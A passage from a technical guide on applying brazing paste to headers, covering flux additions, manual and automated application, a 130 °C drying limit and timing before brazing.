In practice, a small amount of flux can be added to this kind of paste to make the brazing process more forgiving when slightly oxidized components are used. Developments are in hand to find a flux-less paste for this application, too. The paste application methods are well suited for automation. Figure 17 illustrates the principle of paste application to headers. For small production the paste can be applied manually as shown in figure 10. When coating and drying manually, do not overheat the paste. The brazing properties will be destroyed if the paste is heated above 130ºC.
It is recommended to braze the parts within 1-2 days after applying header paste, depending on the storage atmosphere.
figur 18

Important: The brazing properties will be destroyed if the paste is heated above 130 ºC during drying.

Pages